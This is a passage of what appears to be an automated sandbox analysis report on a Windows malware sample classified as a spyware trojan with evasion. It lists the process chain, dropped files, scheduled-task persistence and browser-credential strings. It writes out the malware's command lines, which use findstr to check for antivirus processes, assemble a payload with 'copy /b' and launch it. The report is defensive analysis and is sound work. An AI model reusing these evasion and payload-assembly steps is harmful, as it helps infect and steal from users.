Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75701CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, 20_2_000001BD75701CD0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFDFE7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 22_2_00CFDFE7
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6DFE7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 23_2_00A6DFE7
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6DFE7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 24_2_00A6DFE7
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040352D
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe File created: C:\Windows\Tasks\Dctooux.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040755C 0_2_0040755C
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00406D85 0_2_00406D85
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD75861BA6 20_3_000001BD75861BA6
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD75862C3C 20_3_000001BD75862C3C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD75864A38 20_3_000001BD75864A38
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD75865E7C 20_3_000001BD75865E7C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD7586557C 20_3_000001BD7586557C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD758658FC 20_3_000001BD758658FC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD758624F7 20_3_000001BD758624F7
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD7586279C 20_3_000001BD7586279C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6397318 20_3_00007DF4B6397318
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6375BD8 20_3_00007DF4B6375BD8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637D688 20_3_00007DF4B637D688
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63FB68C 20_3_00007DF4B63FB68C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6448750 20_3_00007DF4B6448750
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64546F8 20_3_00007DF4B64546F8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64483B8 20_3_00007DF4B64483B8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64473A0 20_3_00007DF4B64473A0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63AC45C 20_3_00007DF4B63AC45C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63DA3F4 20_3_00007DF4B63DA3F4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64593FC 20_3_00007DF4B64593FC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B636E414 20_3_00007DF4B636E414
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B8534 20_3_00007DF4B63B8534
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63CF4FC 20_3_00007DF4B63CF4FC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64411BC 20_3_00007DF4B64411BC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64541DC 20_3_00007DF4B64541DC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6448238 20_3_00007DF4B6448238
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63AD210 20_3_00007DF4B63AD210
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6373314 20_3_00007DF4B6373314
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63C6F78 20_3_00007DF4B63C6F78
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B6FA0 20_3_00007DF4B63B6FA0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B643C01C 20_3_00007DF4B643C01C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64040A0 20_3_00007DF4B64040A0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63CB094 20_3_00007DF4B63CB094
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6443DE0 20_3_00007DF4B6443DE0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B9E68 20_3_00007DF4B63B9E68
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637BEC4 20_3_00007DF4B637BEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63ACEC4 20_3_00007DF4B63ACEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6459F40 20_3_00007DF4B6459F40
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B644CF3C 20_3_00007DF4B644CF3C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63D6F20 20_3_00007DF4B63D6F20
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B8BE8 20_3_00007DF4B63B8BE8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6370C44 20_3_00007DF4B6370C44
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638EC44 20_3_00007DF4B638EC44
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6361BFC 20_3_00007DF4B6361BFC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6447CF4 20_3_00007DF4B6447CF4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63BA9C4 20_3_00007DF4B63BA9C4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63C6A10 20_3_00007DF4B63C6A10
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6364A14 20_3_00007DF4B6364A14
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B4A14 20_3_00007DF4B63B4A14
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63C6B20 20_3_00007DF4B63C6B20
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63A17C4 20_3_00007DF4B63A17C4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63AC7E8 20_3_00007DF4B63AC7E8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63877A0 20_3_00007DF4B63877A0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63C6834 20_3_00007DF4B63C6834
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637D850 20_3_00007DF4B637D850
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B7860 20_3_00007DF4B63B7860
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B643780C 20_3_00007DF4B643780C
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64478D8 20_3_00007DF4B64478D8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B64458AC 20_3_00007DF4B64458AC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63AF954 20_3_00007DF4B63AF954
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75700C5C 20_2_000001BD75700C5C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D240F0 22_2_00D240F0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D02263 22_2_00D02263
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D28429 22_2_00D28429
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D24588 22_2_00D24588
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D02A52 22_2_00D02A52
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D28B7B 22_2_00D28B7B
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D28C9B 22_2_00D28C9B
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CE4FE0 22_2_00CE4FE0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D192A3 22_2_00D192A3
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D05241 22_2_00D05241
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CEF420 22_2_00CEF420
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D075E2 22_2_00D075E2
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D29FE0 22_2_00D29FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A940F0 23_2_00A940F0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A72263 23_2_00A72263
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A98429 23_2_00A98429
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A94588 23_2_00A94588
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A72A52 23_2_00A72A52
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A98B7B 23_2_00A98B7B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A98C9B 23_2_00A98C9B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A5EFB0 23_2_00A5EFB0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A54FE0 23_2_00A54FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A892A3 23_2_00A892A3
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A75241 23_2_00A75241
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A5F420 23_2_00A5F420
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A775E2 23_2_00A775E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A99FE0 23_2_00A99FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A59DA0 24_2_00A59DA0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A940F0 24_2_00A940F0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A892A3 24_2_00A892A3
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A72263 24_2_00A72263
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A75241 24_2_00A75241
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A98429 24_2_00A98429
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A94588 24_2_00A94588
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A775E2 24_2_00A775E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A72A52 24_2_00A72A52
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A98B7B 24_2_00A98B7B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A98C9B 24_2_00A98C9B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A54FE0 24_2_00A54FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A99FE0 24_2_00A99FE0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A6EAB8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A6EAA3 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A69510 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A8A1F3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A6EDA2 appears 158 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A6F3E0 appears 89 times
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: String function: 00A68CF0 appears 47 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: String function: 00CFEAB8 appears 35 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: String function: 00CFEDA2 appears 81 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: String function: 00CFF3E0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: String function: 00CF9510 appears 123 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 984
Uses 32bit PE files
Source: J2NWKU2oJi.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 20.3.OpenWith.exe.1bd7775aad0.12.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.5.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.13.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.9.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.27.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.15.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.7.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 20.3.OpenWith.exe.1bd7775aad0.14.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@33/22@1/3
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040352D
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_0040498A
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Spectrum Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\SysWOW64\dialer.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Mutant created: \Sessions\1\BaseNamedObjects\c3c217c6aa232801b551c5b797f47c88
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe File created: C:\Users\user\AppData\Local\Temp\nsdB815.tmp Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat
Source: J2NWKU2oJi.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 00000014.00000003.2377886629.000001BD77981000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378135994.000001BD77940000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2377638858.000001BD77981000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 00000014.00000003.2577831672.000001BD777A5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2319544386.000001BD771A0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2582368636.00007DF4B645F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328001260.000001BD771AC000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: J2NWKU2oJi.exe Virustotal: Detection: 20%
Source: J2NWKU2oJi.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe File read: C:\Users\user\Desktop\J2NWKU2oJi.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\J2NWKU2oJi.exe "C:\Users\user\Desktop\J2NWKU2oJi.exe"
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 331463
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AdditionUnitKoreanLn" Remembered
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 331463\Pleasure.pif 331463\Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 984
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Users\user\AppData\Local\Microsoft\Yuem.exe "C:\Users\user\AppData\Local\Microsoft\Yuem.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe "C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
